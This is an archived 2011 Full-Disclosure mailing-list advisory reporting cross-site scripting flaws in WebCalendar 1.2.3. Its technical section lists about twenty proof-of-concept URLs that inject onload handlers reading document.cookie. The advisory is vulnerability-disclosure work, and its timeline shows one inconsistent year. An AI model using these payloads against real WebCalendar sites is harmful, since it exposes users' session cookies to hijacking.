[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4E1883FA.1050700@t-online.de>
Date: Sat, 09 Jul 2011 18:38:18 +0200
From: "sschurtz@...nline.de" <sschurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Multiple Cross-Site Scripting vulnerabilities in
WebCalendar
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Advisory: Multiple Cross-Site Scripting vulnerabilities in
WebCalendar
Advisory ID: SSCHADV2011-008
Author: Stefan Schurtz
Affected Software: Version 1.2.3 and probably prior versions
Vendor URL: http://www.k5n.us/webcalendar.php
Vendor Status: informed
CVE-ID: -
==========================
Vulnerability Description:
==========================
This is a Cross-Site Scripting vulnerability
==================
Technical Details:
==================
http://[target]/webcalendar/about/"><body onload=alert(document.cookie)>
http://[target]/webcalendar/about/"><body onload=alert('XSS')>
http://[target]/webcalendar/colors.php?color="><iframe
onload=alert(document.cookie)>
http://[target]/webcalendar/datesel.php?form="><iframe
onload=alert(document.cookie)>
http://[target]/webcalendar/datesel.php?form=3&fday="><iframe
onload=alert(document.cookie)>&fmonth=3&fyear=3&date=20110601
http://[target]/webcalendar/datesel.php?form=3&fday=3&fmonth="><iframe
onload=alert(document.cookie)>&fyear=3&date=20110601
http://[target]/webcalendar/datesel.php?form=3&fday=3&fmonth=3&fyear="><iframe
onload=alert(document.cookie)>&date=20110601
http://[target]/webcalendar/year.php/"><body onload=alert(document.cookie)>
http://[target]/webcalendar/select_user.php/"><body
onload=alert(document.cookie)>
http://[target]/webcalendar/week.php/"><body onload=alert(document.cookie)>
http://[target]/webcalendar/month.php/"><body onload=alert(document.cookie)>
http://[target]/webcalendar/search_handler.php/"><body
onload=alert(document.cookie)>
http://[target]/webcalendar/day.php/"><body onload=alert(document.cookie)>
http://[target]/webcalendar/datesel.php/"><body
onload=alert(document.cookie)>
http://[target]/webcalendar/edit_entry.php/"><body
onload=alert(document.cookie)>
http://[target]/webcalendar/search.php/"><body
onload=alert(document.cookie)>
http://[target]/webcalendar/help_edit_entry.php/"><body
onload=alert(document.cookie)>
http://[target]/webcalendar/catsel.php/"><body
onload=alert(document.cookie)>
http://[target]/webcalendar/help_index.php/"><body
onload=alert(document.cookie)>
http://[target]/webcalendar/help_docs.php/"><body
onload=alert(document.cookie)>
http://[target]/webcalendar/help_bug.php/"><body
onload=alert(document.cookie)>
=========
Solution:
=========
- -
====================
Disclosure Timeline:
====================
02-Jul-2011 - informed developers
02-Jul-2011 - Release date of this security advisory
04-Jul-2001 - post on BugTraq
========
Credits:
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References:
===========
http://www.k5n.us/webcalendar.php
http://www.rul3z.de/advisories/SSCHADV2011-008.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk4Yg/kACgkQg3svV2LcbMCIBgCeKwpD6ewcWmgbuBfdrvjqMG6s
ox0AnRb+jp+Q5n69CMZ6UZ4zLal5nEcr
=lmX0
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists